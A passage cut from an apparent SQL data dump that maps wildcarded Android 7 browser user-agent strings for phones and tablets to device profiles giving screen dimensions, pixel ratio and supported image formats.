Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; OK6000 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ONE E1003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ONEPLUS A3000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ONEPLUS A3003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ONEPLUS A3010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ONEPLUS A5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ONEPLUS A5010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; OPPO A77) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; OPPO A83) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; OPPO R11 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; OPPO R11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; OWN FUN 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; One) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Orange Rise 53) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Orange-Rise52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Orange_Rise_33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P008) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P00A) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P00C) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P00L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P028) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P1 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P10000 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P1060X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P12Curve) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P2 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P2Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P4526A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P4_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":341,\"screenHeight\":569,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P5006A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":376,\"screenHeight\":670,\"pixelRatio\":1.275,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P5026A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P5046A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P5047A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P5504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P550S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P5526A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":376,\"screenHeight\":670,\"pixelRatio\":1.275,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P5700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P750i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P771) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P781) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P7_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P8_3D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P8_Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P8_Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P8_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P9000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P9000_MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P9_Energy_S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; P9_Life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PCD509) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PEARL A4 PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PGN528) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PGN610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PGN611) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PH5003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PIC-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PIC-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PMT3157_3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_pm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PMT3157_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_pm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PMT3157_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_prestigio_pm','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":720,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PMT3437_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_prestigio_pm','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; POLYTRON R2509) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; POLYTRON R2509SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; POLYTRON_P552) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRA-AL00X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRA-LA1) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRA-LA1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRA-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRA-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRA-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRA-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRAU8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRO 6 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRO 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRO 6s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRO 7 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 